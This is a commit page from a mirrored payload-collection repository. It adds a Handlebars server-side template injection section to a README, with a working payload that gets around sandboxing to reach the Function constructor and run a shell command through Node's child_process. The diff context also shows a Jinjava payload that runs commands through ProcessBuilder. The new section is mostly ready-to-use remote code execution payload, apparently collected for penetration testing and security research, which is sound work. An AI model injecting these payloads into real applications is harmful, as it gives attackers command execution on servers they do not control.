mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-29 07:45:26 +00:00
Update README.md
Add Handlebars payload
This commit is contained in:
parent
cc95f4e386
commit
76e6f7dc95
@ -44,6 +44,7 @@
|
||||
* [Jinjava](#jinjava)
|
||||
* [Basic injection](#basic-injection)
|
||||
* [Command execution](#command-execution)
|
||||
* [Handlebars](#handlebars)
|
||||
* [ASP.NET Razor](#aspnet-razor)
|
||||
* [Basic injection](#basic-injection)
|
||||
* [Command execution](#command-execution)
|
||||
@ -476,6 +477,37 @@ Fixed by https://github.com/HubSpot/jinjava/pull/230
|
||||
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
|
||||
```
|
||||
|
||||
## Handlebars
|
||||
|
||||
### Command Execution
|
||||
|
||||
```handlebars
|
||||
{{#with "s" as |string|}}
|
||||
{{#with "e"}}
|
||||
{{#with split as |conslist|}}
|
||||
{{this.pop}}
|
||||
{{this.push (lookup string.sub "constructor")}}
|
||||
{{this.pop}}
|
||||
{{#with string.split as |codelist|}}
|
||||
{{this.pop}}
|
||||
{{this.push "return require('child_process').execSync('ls -la');"}}
|
||||
{{this.pop}}
|
||||
{{#each conslist}}
|
||||
{{#with (string.sub.apply 0 codelist)}}
|
||||
{{this}}
|
||||
{{/with}}
|
||||
{{/each}}
|
||||
{{/with}}
|
||||
{{/with}}
|
||||
{{/with}}
|
||||
{{/with}}
|
||||
```
|
||||
|
||||
### References
|
||||
|
||||
- [Handlebars template injection and RCE in a Shopify app ](https://mahmoudsec.blogspot.com/2019/04/handlebars-template-injection-and-rce.html)
|
||||
- [Lab: Server-side template injection in an unknown language with a documented exploit](https://portswigger.net/web-security/server-side-template-injection/exploiting/lab-server-side-template-injection-in-an-unknown-language-with-a-documented-exploit)
|
||||
|
||||
## ASP.NET Razor
|
||||
|
||||
### Basic injection
|
||||
|
Loading…
Reference in New Issue
Block a user